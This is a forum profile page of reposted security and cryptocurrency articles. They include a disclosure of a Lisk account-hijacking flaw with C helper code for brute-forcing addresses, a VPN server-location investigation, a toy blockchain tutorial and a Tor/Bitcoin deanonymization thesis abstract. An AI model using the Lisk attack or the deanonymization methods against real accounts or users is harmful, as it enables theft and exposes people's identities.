-
Posts
1337 -
Joined
-
Last visited
-
Days Won
89
Everything posted by Usr6
-
I’ve been reviewing the source code of a number of blockchain thingies, both for paid audits and for fun on my spare time, and I routinely find real security issues. In this post I’ll describe a vulnerability noticed a while ago, and now that Lisk finally describes it and warns its users, I can comment on its impact and exploitability. TL;DR: you can hijack certain Lisk accounts and steal all their balance after only 264 evaluations of the address generation function (a combination of SHA-256, SHA-512, and a scalar multiplication over Ed25519’s curve). What is Lisk? In blockchain-speak, Lisk is yet another platform for building decentralized applications. To simplify, Lisk is a kind of Ethereum where contracts are written in JavaScript—instead of Solidity or Viper—and where the consensus protocol relies on proof-of-stake instead of proof-of-work. More precisely, Lisk uses a delegated proof-of-stake (DPoS) protocol, wherein a limited number of nodes, chosen by user through a voting mechanism, will actually validate transactions. Having only a limited number (101) of validators speeds up transactions validation while keeping Lisk kinda decentralized. As I’m writing this, Lisk is ranked 19th on coinmarketcap, with a market cap of approximately 3.4 billions of dollars. First problem: short addresses Like in any cryptocoin platform, coin owners are identified by an address. In Lisk, addresses are 64-bit numbers, such as 3040783849904107057L. Whereas in Bitcoin, for example, an address is simply a hash of one’s public key, a Lisk address is derived deterministically from a passphrase, while generating the users’s keypair along the way. In more details, it works like this: Given a passphrase, compute a 256-bit seed as seed = SHA-256(passphrase). Derive an Ed25519 keypair from this seed, which involves computing SHA-512(seed) and a scalar multiplication. Compute the SHA-256 hash of the public key, and define the address as the last 8 bytes of the 32-byte hash. Now you guess part of the problem: you can find a preimage of any address in approximately 264 evaluations of the above series of operations. Second problem: no address–key binding Ideally, short addresses shouldn’t be a huge problem: if an address already exists and is bound to a key pair, you shouldn’t be able to hijack the account by finding another passphrase/keypair mapping to this address. And that’s the second problem: an address isn’t bound to a keypair until it has sent money to another address (or voted for a delegate). What this means is that if an account only receives money but never sends any, then it can be hijacked by finding a preimage—and once the attacker has found a preimage, they can lock the original user out of their account by issuing a transaction and binding the address to their new passphrase/keypair. I don’t know how many accounts are vulnerable, but it’s easy to find ones: just by browsing through the top accounts list, you can for example find a vulnerable that holds more than 1.6 million of Lisk units (or $48M)—look for an account with no associated public key. Exploitation and mitigation Running the 264 address computations isn’t instantaneous though; because it involves a key generation operation, these 264 operations are considerably slower than (say) 264 evaluations of a hash function like SHA-256. But completing the attack within a month will clearly cost you less than $48M. And of course in practice you’ll parallelize the attacks on N cores, and you’ll target one-of-M addresses, so the expected running time will only be around 263/NM operations. With only 64 targets and 256 cores, we’re talking of 249 iterations. As Lisk now recommends, “it’s important to broadcast the correct public key to the network for any given Lisk address. This can be done by simply sending at least one transaction from a Lisk account.” I don’t know whether this vulnerability has been exploited, but yet again this shows that blockchain systems security is a vastly unexplored area, with lot of unaudited architectures and source code, and new bug classes to be found and exploited. PoC||GTFO I’ve tested that the attack works, by first finding a collision (two passphrases/keypairs mapping to the same address), creating an account using the first passphrase, receiving money to this address, and then hijacking the account using the second passphrase. I also simulated a real preimage attack to estimate the cost of the attack on my machine (can’t find the numbers though, it was a while ago). If you’re interested in benchmarking this, the following code can be useful (combined with an optimized implementation of Ed25519’s arithmetic). 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 #define N 16 // generates a pub key from a 32-byte seed int pubkeyFromSeed(unsigned char *pk, const unsigned char *seed) { unsigned char az[64]; sc25519 scsk; ge25519 gepk; sha512(az,seed,32); az[0] &= 248; az[31] &= 127; az[31] |= 64; sc25519_from32bytes(&scsk,az); ge25519_scalarmult_base(&gepk, &scsk); ge25519_pack(pk, &gepk); return 0; } // computes raw pub key from utf-8 secret static inline void pubkeyFromSecret(const char *secret, size_t secretlen, uint8_t *pk) { // first hash secret uint8_t seed[32]; SHA256((const unsigned char*)secret, secretlen, seed); pubkeyFromSeed(pk, seed); } // computes raw address from raw pubkey static inline void addressFromPubkey(const uint8_t *pk, uint8_t *address) { uint8_t hash[32]; SHA256(pk, 32, hash); for(int i=0; i<N/2; ++i) address = hash[7-i]; } string addrToStr(unsigned long long a) { stringstream ss; ss << hex << setw(16) << setfill('0') << a; return ss.str(); } // address is N/2-byte long unsigned long long addressToInt(uint8_t * address) { unsigned long long addressint = 0; for(int i=0; i<N/2; ++i) { addressint |= (uint64_t)address << (56 - (i*8)); } return addressint; } // tested to match /api/accounts/open unsigned long long addressFromSecret(unsigned long long in) { uint8_t pk[32]; uint8_t address[N/2]; string s = addrToStr(in); pubkeyFromSecret(&s[0u], N, pk); addressFromPubkey(pk, address); return addressToInt(address); } And there’s more: secret keys aren’t secret Ah, and there’s another security issue in Lisk: looking at the client API documentation, you’ll notice that clients need to send their passphrase (the secret value) to open an account or to send a transaction. In other word, Lisk is missing the whole point of public-key cryptography, which is to keep secret keys secret. Oh, and there’s even an endpoint (/api/accounts/open) that allows you to request your public key given your secret key. So much for trustlessness and decentralization. Sursa: https://research.kudelskisecurity.com/2018/01/16/blockchains-how-to-steal-millions-in-264-operations/
-
- 2
-
România intră în lumea monedelor virtuale şi va lansa curând prima criptomonedă. În spatele proiectului sunt IT-işti încurajaţi de succesul Bitcoin, care în ultimii ani a avut o creştere accelerată. Criptomonedele nu sunt emise de vreo bancă, ci de o platformă virtuală, printr-un procedeu extrem de complex. În funcţie de cererea pe piaţă, acesteia îi scade sau îi creşte valoarea. Adrian Stratulat, lead evangelist: Ideea din spatele criptomonezilor a fost să descentalizăm sistemul monetar, să nu mai avem o singură instituţie care să stabilească politica monetară la nivelul unei societăţi. Banii virtuali se obţin printr-un proces numit minare, prin care nişte calculatoarea ultraperformante legate la platforma virtuală rezolvă formule matematice complexe. Cu cât mai dificile, cu atât creşte şi valoarea monedei obţinute. Adrian Stratulat lead evangelist: Sunt anumite tipuri de minare care utilizează mai mult memoria internă sau procesorul, altele care folosesc procesorul grafic şI altele care favorizează chiar dispozitive hardware specializate pentru minare. Adrian Stratulat, lead evangelist: Există exchange-uri, puncte în care poţi să iei o criptomonedă şi să o transformi într-o valută reală, în euro în lei sau în dolari. Portofelele digitale în care se ţin criptomonedele sunt foarte sigure şi nu pot fi sparte de infractori cibernetici, susţin cei care lucrează cu astfel de platforme. Alexandru Ionuţ Budişteanu, lead developer: Sunt nişte algoritmi matematici în spate care creează o securitate enormă în criptomonede. Şi IT-işti de la noi se pregătesc să lansesze prima criptomonedă românească. Vor ca moneda lor să poată fi accesată de orice persoană, indiferent dacă are sau nu cunoştinţe în domeniu. Ionuţ Alexandru Panait, leader platform developer: Dacă în momentul de faţă aveai nevoie să descarci 200 de gb şi să ai cunoştinţe de programare ca să minezi în terminal, acum conceptul pe care îl aducem noi e piaţă, poţi să faci acelaşi lucru doar deschizănd browserul şi căutând platforma noastră. Prima criptomonedă, Bitcoin, a fost creată în 2009, iar fenomenul continuă să ia amploare. Sursa: https://www.digi24.ro/stiri/sci-tech/lumea-digitala/prima-moneda-virtuala-romaneasca-860158
-
Name: TheBodyguard.jpg MD5: 1593E87EA6754E3960A43F6592CC2509 import string alfabet = string.ascii_lowercase alfabet2 = string.ascii_uppercase parola = "?" plain_text = "" for i in parola: if i in alfabet: plain_text += i def enc1(text): ret = "" for i in text: tmp = alfabet.find(i) if tmp != -1: ret += alfabet2[(tmp + 3) % 26] return ret def enc2(t1, t2): ret = "" for i in range(len(t1)): ret += str(ord(t1[i]) + ord(t2[i])) + "," return ret print "You need this:", enc2(parola, enc1(parola)) Output: You need this:201,203,165,195,165,191,205,187,181,191,173,187,173,187,193,199,
-
While this setup of Kali on Windows is not optimal due to various environmental restrictions (such as the lack of raw sockets and lack of customised Kali kernel), there are still many situations where having Kali Linux alongside your Windows 10 machine can be beneficial. One example that comes to mind is consolidation of workspaces, especially if Windows is your main working environment. Other useful situations that crossed our minds were standardizing tools and scripts to run across multiple environments, quick porting of Linux penetration testing command line tools to Windows, etc. For example, below is a screenshot of running the Metasploit Framework from Kali Linux, over WSL. Link: https://www.kali.org/tutorials/kali-on-the-windows-subsystem-for-linux/
-
- 3
-
Introduction Bitcoin and cryptocurrencies made a lot of noise lately. I have been rather disappointed by the turn the cryptocurrencies took, from an amazing concept to what seems just another way to make quick money ( or not... ). But I became very interested by the technologies enabling cryptocurrencies, and obviously by the concept of a blockchain. The concept is fascinating, and not limited to Bitcoin and friends. We could imagine many applications for such a technology. So, in a proper developer manner, I decided to code one blockchain, or what I think is a blockchain, to understand better what it is. A simple project So, what do we need to create a very simple blockchain? A block A block is what the blockchain is made of. In our case, a block will be composed of a date, an index, some data ( a message in our case ), and the hash of the previous block. Cryptography To keep informations secure, we need to encrypt our data. For our little project, we will use the js-sha256 package. This process will create a string of 64 characters. Ultimately, our blockchain will be a series of hashes, each composed of 64 characters. As I said earlier, we use the hash of the previous block to encrypt a new block ( that is why we call it a chain ). Difficulty and nonce We don't just create one hash per block and that's it. A hash must be valid. In our case, a hash will be valid if the first four characters of our hash are 0. If our hash starts with '0000......', it is considered valid. This is called the difficulty. The higher the difficulty, the longer it takes to get a valid hash. But, if the hash is not valid the first time, something must change in the data we use right? If we use the same data over and over, we will get the same hash over and over and our hash will never be valid. You are right, we use something called nonce in our hash. It is simply a number that we increment each time the hash is not valid. We get our data (date, message, previous hash, index) and a nonce of 1. If the hash we get with these is not valid, we try with a nonce of 2. And we increment the nonce until we get a valid hash. Genesis block Their must be a first block in our chain. It is called the genesis block. Of course, this block can't use the hash of the previous block because it doesn't exist. We will just give it some arbitrary data to create its hash. And that is pretty much what we need for our blockchain. The methods We will need a few methods to make a functional blockchain: initialize our blockchain => creates the genesis block hash our blocks => a function responsible for creating a valid hash check the validity of a hash => does our hash starts with 'OOOO' ? get the last hash => we need the previous hash to create a new block add a new block => We need to do that at one point, if we want a chain THE COOOOODE !! Let's get coding now. For this little project, I will create two files, one called index.js and another called blockchain.js. The second one will hold our little module to create a blockchain. It's straightforward, let's take a look at it: const sha256 = require('js-sha256').sha256 const blockchain = (function(){ const blocks = [] const initBlockchain = () => { const data = 'Hello World!' const timestamp = new Date() const previousHash = 0 const index = 0 hashBlock(data, timestamp, previousHash, index) } const hashBlock = (data, timestamp, prevHash, index) => { let hash = '', nonce = 0 while( !isHashValid(hash) ){ let input = `${data}${timestamp}${prevHash}${index}${nonce}` hash = sha256(input) nonce += 1 } console.log(nonce) blocks.push(hash) } const getLastHash = blocks => blocks.slice(-1)[0] const isHashValid = hash => hash.startsWith('0000') // Difficulty const addNewBlock = data => { const index = blocks.length const previousHash = getLastHash(blocks) hashBlock(data, new Date(), previousHash, index) } const getAllBlocks = () => blocks return { initBlockchain, getLastHash, blocks, getAllBlocks, addNewBlock } })() module.exports = blockchain So, in this module, I have a few methods. At the top, I import the module that will handle the cryptography part. I have an empty array that will hold my blockchain's blocks, called blocks. initBlockchain: This method starts the blockchain by creating the first block, the genesis block. I give it a timestamp, a message, the block's index in the blockchain ( 0 ) and a arbitrary previous hash because there are no previous blocks in the chain yet. With all these informations, I can now create the hash for the genesis block. hashBlock: This method takes all the block's data and creates a hash. As you can see, the first time we run the function for a specific block, the nonce is set to 0. We encrypt our block and check if the hash is valid with isHashValid. In our case, a hash is valid if the four first characters are 0. This is called the difficulty. This is the problem we have to solve to make sure the block can be part of the blockchain. Once the hash is valid, we add it to our blocks array. addNewBlock: This method is responsible for creating a new block. We only need to give it the message as an argument, because all the other arguments ( index, previousHash, and timestamp) can be found in the blockchain. The method calls hashBlock with the data to create and validate the new block. getLastHash: The method I call to get the previous hash. We always need the previous hash to create a new block. getAllBlocks: Just returns all the blocks currently in the blockchain Great, so let's move to index.js to use our new blockchain! const blockchain = require('./blockchain') blockchain.initBlockchain() blockchain.addNewBlock('First new block') blockchain.addNewBlock('I love blockchains') blockchain.addNewBlock('Make me a new hash!!') console.log(blockchain.getAllBlocks()) We initialize our blockchain, then we create three new blocks. When I run this, I get the following chain in response: Initializing the blockchain 139355 30720 68789 51486 [ '0000d87875f12e8c00d60cdfc8c21c4867eb1e732d3bb0e4d60bd0febcfafbaf', '0000331d80f4e83461bad846e082baa08c5e739edfa19a4880c1dcbe4eed1984', '00000dcab247410050e357158edc20555cc0110429023fdadb1d8cda3e06da5e', '0000a16968811cf75c33d877e99f460d396c46b5485f669c8e55b193b862106d' ] The array represent the four blocks. As you can see, every single one of them starts with four zeros, so every single hash is valid. If one of those hashes didn't start with four zeros, I would know right away the hash was invalid, therefore, the data in the corresponding block should probably not be trusted. There are four numbers here: 139355, 30720, 68789, 51486. These are the nonce for each block. I printed them out to see how many times the function hashBlock ran to come to a valid hash. The first block, the genesis block, ran 139355 times before having a valid hash! The second, 30720 times. The third 68789 times and the fourth 51486 times. Conclusion This is a very simple example of a blockchain. I'm pretty sure I missed a few things here. I also kept things pretty simple because hey, I'm learning! This little project made me understand a few things: If one person decides to modify a previous block, she would have to change every single block after that one. Each block inherits from its parent ( previous hash ), so trying to cheat a blockchain seems complicated. But if a majority of the blockchain's users decide to cheat, they could modify a previous block and all agree to change the rest of the blockchain accordingly. A blockchain seems to work only if the majority decides to follow the rules. Or you could end up with two different blockchains, one where the users decided to stick with the original data, and the other where the users decided to use the modified blockchain. I've heard about the Bitcoin enormous use of power where it came to mining. Mining is the concept of solving the difficulty problem when you encrypt the data. You get the transaction and you try to find a valid hash for that block. As a reward for your effort, you get some bitcoin. I can only imagine the amount of power you would use when the blockchain becomes huge. Well, that's about what I got from that. It made things a lot clearer for me. Feel free to correct me if i got things wrong! Sursa: https://dev.to/damcosset/trying-to-understand-blockchain-by-making-one-ce4
- 1 reply
-
- 5
-
"doar sa faci pe inteligentul" insinuezi ca nu sunt?
-
Din moment ce ai ramas pe forum deduc ca te consideri destept, chiar daca nu poti accepta nimic inafara de parerile tale doresc sa fac niste mici observatii asupra textului postat de tine. - "fac pe Dumnezeii pe aici." Dumnezeu este unu singur. - "au ramai" -> au ramas - dupa punctul de la sfarsitul unei propozitii se lasa un spatiu inainte de a incepe urmatoarea propozitie - "Cand apare cate unul care nu are habar de o chestie sau cere ceva, este huduit si injurat in loc sa i se explice problema frumos" - pe acest forum exista multe persoane care lucreaza in it, imagineaza-ti ca ai fi sysadmin/net admin/red & blue team etc si vezi un topic in care cineva intreaba de scanat rdp,rooturi, ssh, smtp, telnet, etc, cum ai reactiona? Daca ai fi moderator/admin de partea cui ai fi?
-
Do VPNs really have all the servers they claim in exotic locations all over the world? In many cases, the answer is no. The true location of some VPN servers may be entirely different. In other words, a server that is allegedly in Pakistan is actually in Singapore. Or a server that should be in Saudi Arabia is actually in Los Angeles, California. (Both are real examples from below.) This is known as spoofing the true location. Why is this important? First, the performance may suffer if the actual server is significantly further away. Second, it’s bad if you are trying to avoid certain countries (such as the UK or US) where the server may be located. Third, customers aren’t getting the true server locations they paid for. And finally, using fake server locations raises questions about the VPN’s honesty. In this article we’ll take a deep dive into the topic of fake VPN server locations. The point here is not to attack any one VPN provider, but instead to provide honest information and real examples in order to clarify a confusing topic. We will cover four main points: VPN server marketing claims Fake server locations with ExpressVPN (11 are identified) Fake server locations with PureVPN (5 are identified, but there are many more) How to test and find the true location of VPN servers But before we begin, you might be asking yourself, why do VPNs even use fake server locations? The incentives are mainly financial. First, it saves lots of money. Using one server to fake numerous server locations will significantly reduce costs. (Dedicated premium servers are quite expensive.) Second, advertising numerous server locations in a variety of countries may appeal to more people, which will sell more VPN subscriptions. Here’s how that works… My, what a larger server network you have! Most of the larger VPN providers boast of server networks spanning the entire world. This seems to be the trend – they are emphasizing quantity over quality. Take Hidemyass for example and their server network claims: If you think there are physical servers in 190+ countries, I have a bridge to sell you! Upon closer examination of Hidemyass’s network, you find some very strange locations, such as North Korea, Zimbabwe, and even Somalia. But reading further, it becomes clear that many of these locations are indeed fictitious. Hidemyass refers to these fictitious server locations as “virtual locations” on their website. Unfortunately, I could not find a public server page listing all server URLs, so I could not test any of the locations. However, the Hidemyass chat representative I spoke with confirmed they use “virtual” locations, but could not tell me which locations were fake and which were real. PureVPN is another provider that admits to using fake locations, which they refer to as “virtual servers” – similar to Hidemyass. (We will take a closer look at PureVPN below, with testing results for the servers that are not classified as virtual.) ExpressVPN also boasts of a large server network. Unlike with PureVPN and Hidemyass, ExpressVPN does not admit to using fake locations anywhere on its website. The ExpressVPN chat representative I spoke with claimed that all server locations were real. (This was proven through testing to be false.) Testing shows that many of ExpressVPN’s server locations are fake. Just like with Hidemyass and PureVPN, testing results show that ExpressVPN is using fictitious server locations, which we will cover in detail below. Testing VPN server locations With free network-testing tools, you can quickly find the true location of a VPN server. This allows you to cross-check dubious server locations with a high degree of accuracy. For every VPN server examined in this article, I used three different network-testing tools to verify the true location beyond any reasonable doubt: CA App Synthetic Monitor ping test (ping test from 90 different worldwide locations) CA App Synthetic Monitor traceroute (tests from various worldwide locations) Ping.pe (ping test from 24 different worldwide locations) First, I used this ping test, which pings the VPN server from 90 different worldwide locations. This allows you to narrow down the location with basic triangulation. In general, the lower the time (ms), the closer the server is to a given location. Pretty simple and accurate. Second, I ran traceroutes from various locations based on the results in the first test. This allows you to measure the distance along the network to the final VPN server. With ExpressVPN, for example, I could run a traceroute from Singapore and find that the VPN server is about 2 ms away, which means it is also located in Singapore. Third, I used another ping test to again ping the VPN server from different worldwide locations. This tool also includes traceroutes for each location (MTR). Note: When running traceroutes or ping tests, you may have some outlier test results due to different variables with the network and hops. That’s why I recommend running multiple tests with all three of the tools above. This way, you will be able to eliminate outlier results and further confirm the true server location. With every fictitious server location found in this article, all three tools strongly suggested the exact same location. If there was any doubt, I did not label the server as “fake” below. ExpressVPN server locations As we saw above, ExpressVPN boasts a large number of servers on their website in some very interesting locations. In the map below you can see many of their southeast Asia server locations in red boxes. These are all the locations that were determined to be fictitious after extensive testing, with the actual server being located in Singapore. Every ExpressVPN server location in a red box was found to be fake after extensive testing. ExpressVPN does not make any of their server URLs publicly available. So to obtain the server URL, you need to have an ExpressVPN account, then go into the member area and download the manual configuration files. In total, I found 11 fake VPN server locations with ExpressVPN. Below I will show you the test results for one location (Pakistan). You can find the the other test results in the Appendix to this article. ExpressVPN’s Pakistan server (Singapore) URL: pakistan-ca-version-2.expressnetw.com Test 1: Ping times from different worldwide locations reveals the server is much closer to Singapore than to Bangalore, India. If the server was truly in Pakistan, this would not make much sense. … At only 2 milliseconds ping (distance), this “Pakistan” server is without a doubt in Singapore. But to further prove the location, we can run a few more tests. Test 2: Running a traceroute from Singapore to the “Pakistan” VPN server, we can once again verify that this server is in Singapore, at about 2 ms ping. Looking at every hop in the traceroute gives you the full picture of the network path. This shows how much distance (time) is between the final VPN server and the traceroute location. At around 2 ms, this server is clearly in Singapore. Just for fun, we will run one more test, even though it is already clear where the server is located. Test 3: Here is another ping test using the website ping.pe. The Pakistan server location is undoubtedly fictitious (spoofed). The real location is in Singapore. One other sign you see with ExpressVPN’s fake server locations is the second-to-last server IP address (before the final hop) when you run the traceroute is the same. With all the fake server locations in Asia you find this IP address before the final hop: 174.133.118.131 With a traceroute you can see that the final (spoofed) server is always very close to the IP address above. This is simply more evidence pointing to the obvious conclusion that Singapore is the true location of all these servers. In addition to Pakistan, here are the other fictitious server locations found with ExpressVPN: Nepal Bangladesh Bhutan Myanmar Macau Laos Sri Lanka Indonesia Brunei Philippines Note: there may be more fake locations, but I did not have time to test every server. Update: Six days after publishing this article ExpressVPN has admitted to numerous fake locations on its website (mirror) – 29 fictitious locations in total. Just like PureVPN and Hidemyass, ExpressVPN refers to these as “virtual” server locations. PureVPN server locations PureVPN has quite a few fake server locations. On the PureVPN server page you find that many of the servers begin with “vl” which seems to stand for “virtual location”. You find two different types of these prefixes: vleu (which probably stands for virtual location Europe) and vlus (which likely means virtual location US). Every “vl” location I tested was indeed fake (or “virtual” as they like to call it). But I also found that many of their non-virtual locations are also fake, such as Aruba and Azerbaijan in the screenshot above. Here is one example: PureVPN’s Azerbaijan server (United Kingdom) URL: az1-ovpn-udp.pointtoserver.com The ping test clearly shows this server location to be in the United Kingdom – in close proximity to Edinburgh. Furthermore, the ping times for Turkey (which is close to Azerbaijan) are much higher than the UK. The server location is already clear; it is located in the UK. But to further verify the location beyond doubt, I ran a traceroute from Edinburgh, UK to the “Azerbaijan” server: At around 2 milliseconds, this server is without a doubt in the United Kingdom, not Azerbaijan. In addition to Azerbaijan, I also found four other fake “non-vl” server locations with PureVPN: Aruba Saudi Arabia Bahrain Yemen Note: I did not spend much time testing PureVPN server locations because it was clear that many locations were fake. Consequently, I only chose five examples for this article. How to find the real VPN server location Determining the real location of a VPN server is quick and easy with the five steps below. Step 1: Obtain the VPN server URL or IP address You should be able to find the URL or IP address of the VPN server in the members area. You may need to download the VPN configuration file for the specific location, and then just open the file and get the URL for the server. Some VPNs openly provide this information on their server page. Here I downloaded the OpenVPN configuration file for the ExpressVPN Nepal server. After opening the file, I find the server URL near the top. Now copy the URL of the VPN server for step 2. Step 2: Ping the VPN server from different worldwide locations Use this free tool from CA App Synthetic Monitor to ping the VPN server from about 90 different worldwide locations. Enter the VPN server URL (or IP address) from step 1 into the box and hit Start. It will take a few seconds for the ping results to show. Step 3: Examine results to determine actual location Now you can examine the results, looking for the lowest ping times to determine the closest server. You may want to have a map open to examine which server should have the lowest ping based on geographical distance. From all of the testing locations, Bangalore, India should have the lowest ping due to its close proximity to Nepal. But if you look at all the results, you may find that the exact location of the server is somewhere else. Looks like we have a winner. This VPN server is located in Singapore – NOT Nepal. At this point it is clear that the server location is in Singapore, and not Nepal (for this example). But just to verify these results, we will run some more tests. Step 4: Run a few traceroute tests You can further probe the exact location by running a traceroute test. This is simply a way to measure the time it takes for a packet of data to arrive at the server location, across the different hops in the network. There are different options for traceroute testing, such as the Looking Glass from Hurricane Electric. My preferred method is to use this traceroute tool from CA App Synthetic Monitor and then select the location to run the traceroute from. First, you can run the traceroute from a location that should be the closest to the server location. In this case, that would be New Delhi, which is the closest location I can find to Nepal. Just enter the VPN server URL and select your test location for the traceroute. Now we will run another traceroute, but this time from Singapore. We have a winner: Singapore. It is now clear that this ExpressVPN Nepal server is located in Singapore. But you can also cross check with one more test. Step 5: Run another ping test Just like in step 2, Ping.pe will ping the VPN server from different worldwide locations, allowing you to narrow down the likely location. This tool will continuously ping the server and calculate the average time for every location. Furthermore, it will run traceroutes for every location, allowing you to further verify the location. As before, simply enter the VPN server URL and hit Go. The ping results will continuously populate in the chart. Once again, the results clearly show this server is in Singapore. No doubt about it. Now we can see beyond all doubt, this VPN server is located in Singapore, not Nepal. Controlling for variables With every fake server location I found, all three tools strongly suggested the same location. Nonetheless, you may still get some outlier results due to different variables and hops in the network. To control for variables and easily eliminate these outliers, simply run multiple tests with all three tools. You should find the results to be very consistent, all pointing to the same location. Conclusion on fake VPN server locations Dishonesty is a growing problem with VPNs that more people are starting to recognize. From fake reviews to shady marketing tactics, false advertising, and various VPN scams, there’s a lot to watch out for. Fake VPN servers are yet another issue to avoid. Unfortunately with all the deceptive marketing, it can be difficult to find the true facts. Most VPNs emphasize the size of their server network rather than server quality. This quantity over quality trend is obvious with most of the larger VPN providers. On the opposite end of the spectrum are smaller VPN services that have fewer locations, but prioritize the quality of their server network, such as Perfect Privacy and VPN.ac. Some VPN users may not care about fake servers. Nonetheless, fake VPN servers can be problematic if you: are trying to avoid specific countries are trying to optimize VPN performance (which may be affected by longer distances) are trying to access restricted content (fake locations may still be blocked) expect the server to be where the VPN says it is (honesty) With the tools and information in this article, you can easily verify the location of any VPN server, which removes the guesswork completely. Appendix (testing results) ExpressVPN Nepal (Singapore) URL: nepal-ca-version-2.expressnetw.com And now running a traceroute to the “Nepal” server from Singapore: This “Nepal” server is located in Singapore. ExpressVPN Bhutan (Singapore) URL: bhutan-ca-version-2.expressnetw.com And now running a traceroute to the “Bhutan” server from Singapore: Once again, ExpressVPN’s “Bhutan” server is located in Singapore. ExpressVPN Sri Lanka (Singapore) URL: srilanka-ca-version-2.expressnetw.com Here’s the traceroute to the “Sri Lanka” server from Singapore: The “Sri Lanka” server is actually in Singapore. ExpressVPN Bangladesh (Singapore) URL: bangladesh-ca-version-2.expressnetw.com Here’s the traceroute to the “Bangladesh” server from Singapore: It is easy to see that the “Bangladesh” server is located in Singapore, especially when you compare the locations using the ping test. ExpressVPN Myanmar (Singapore) URL: myanmar-ca-version-2.expressnetw.com Here’s the traceroute to the “Myanmar” server from Singapore: This VPN server is located in Singapore (also verified by the other tests). ExpressVPN Laos (Singapore) URL: laos-ca-version-2.expressnetw.com Here’s the traceroute to the “Laos” server from Singapore: This server is also clearly in Singapore. ExpressVPN Brunei (Singapore) URL: brunei-ca-version-2.expressnetw.com Here’s the traceroute to the “Brunei” server from Singapore: Once again, this is clearly in Singapore. But given the close geographic proximity of these locations, I also checked ping times from neighboring countries, such as Malaysia and Indonesia, which were all significantly higher than the ping time from Singapore. All tests pointed to the same conclusion: Singapore. ExpressVPN Philippines (Singapore) URL: ph-via-sing-ca-version-2.expressnetw.com Unlike all of the other fictitious server locations, ExpressVPN appears to be admitting the true location with the configuration file name. Below you see that the config file is named “Philippines (via Singapore)” – which suggests the true location. Here’s the traceroute to the “Philippines” server from Singapore: Just like with all the other traceroute tests, this location is also in Singapore. ExpressVPN Macau (Singapore) URL: macau-ca-version-2.expressnetw.com This was another server location that was very easy to identify as fake using the ping test. Because Hong Kong and Macau are right next to each other, the closest ping result should have been with the Hong Kong server. But instead, Hong Kong’s ping time was about 32 milliseconds and Singapore’s ping time was again around 2 milliseconds. Here is the traceroute to “Macau” from Singapore: Another fake server location, which is clearly in Singapore. ExpressVPN Indonesia (Singapore) URL: indonesia-ca-version-2.expressnetw.com The ping test with this location was another dead giveaway. The ping result from Jakarta, Indonesia was 198 milliseconds, and the ping result from Singapore was under 2 milliseconds. Again, case closed. Here is the traceroute from Singapore: Location: Singapore. PureVPN Aruba (Los Angeles, USA) URL: aw1-ovpn-udp.pointtoserver.com All tests show this server is located in Los Angeles, California (USA). Here is the traceroute from Los Angeles: Actual server location: Los Angeles, California PureVPN Bahrain (Amsterdam, Netherlands) URL: bh-ovpn-udp.pointtoserver.com Here is the traceroute from Amsterdam. This “Bahrain” server is undoubtedly in Amsterdam. PureVPN Saudi Arabia (Los Angeles, USA) URL: sa1-ovpn-udp.pointtoserver.com Now running the traceroute from Los Angeles, California: This “Saudi Arabia” server is in Los Angeles. PureVPN Yemen (Frankfurt, Germany) URL: ym1-ovpn-udp.pointtoserver.com Here’s the traceroute from Frankfurt: PureVPN’s “Yeman” server is clearly in Frankfurt, Germany. UPDATES HideMyAss (November 2017) – As a response, HideMyAss has told us, “We have always been open and transparent about virtual server locations and believe that the concept is explained comprehensively both on our website and in our latest software client.” However, when you examine their server locations page, it is still not clear exactly which locations are “virtual”. ExpressVPN – ExpressVPN has fully updated their server locations page to explain exactly which servers are real and which are “virtual”. They have also removed all contradictory claims about “no logs” and clarified their exact policies. You can check out the details on the ExpressVPN website here. PureVPN – We have not heard anything form PureVPN since this article was first published. However, we did recently learn that PureVPN has been providing connection logs to the FBI while still claiming to have a “zero log policy”. Sursa: https://restoreprivacy.com/vpn-server-locations/
- 1 reply
-
- 5
-
Abstract Al Jawaheri, Husam, B, Masters: June: 2017, Master of Computing Title: DEANONYMIZING TOR HIDDEN SERVICE USERS THROUGH BITCOIN TRANSACTIONS ANALYSIS Supervisor of Thesis: Qutaibah Malluhi With the rapid increase of threats on the Internet, people are continuously seeking privacy and anonymity. Services such as Bitcoin and Tor were intro- duced to provide anonymity for online transactions and Web browsing. Due to its pseudonymity model, Bitcoin lacks retroactive operational security, which means historical pieces of information could be used to identify a certain user. We investigate the feasibility of deanonymizing users of Tor hidden services who rely on Bitcoin as a method of payment. In particular, we correlate the public Bitcoin addresses of users and services with their corresponding trans- actions in the Blockchain. In other words, we establish a provable link between a Tor hidden service and its user by simply showing a transaction between their two corresponding addresses. This subtle information leakage breaks the anonymity of users and may have serious privacy consequences, depending on the sensitivity of the use case. To demonstrate how an adversary can deanonymize hidden service users by exploiting leaked information from Bitcoin over Tor, we carried out a real-world experiment as a proof-of-concept. First, we collected public Bitcoin addresses of Tor hidden services from their .onion landing pages. Out of 1.5K hidden services we crawled, we found 88 unique Bitcoin addresses that have a healthy economic activity in 2017. Next, we collected public Bitcoin addresses from two channels of online social networks, namely, Twitter and the BitcoinTalk forum. Out of 5B tweets and 1M forum pages, we found 4.2K and 41K unique online identities, respectively, along with their public personal information and Bitcoin addresses. We then expanded the lists of Bitcoin addresses using closure analysis, where a Bitcoin address is used to identify a set of other addresses that are highly likely to be controlled by the same user. This allowed us to collect thousands more Bitcoin addresses for the users. By analyzing the transactions in the Blockchain, we were able to link up to 125 unique users to various hidden services, including sensitive ones, such as The Pirate Bay, Silk Road, and WikiLeaks. Finally, we traced concrete case studies to demonstrate the privacy implications of information leakage and user deanonymization. In particular, we show that Bitcoin addresses should always be assumed as compromised and can be used to deanonymize users. Link: http://qspace.qu.edu.qa/bitstream/handle/10576/5797/Deanonymizing Tor Hidden Service Users Through Bitcoin Transactions Analysis.pdf
-
- 2
-
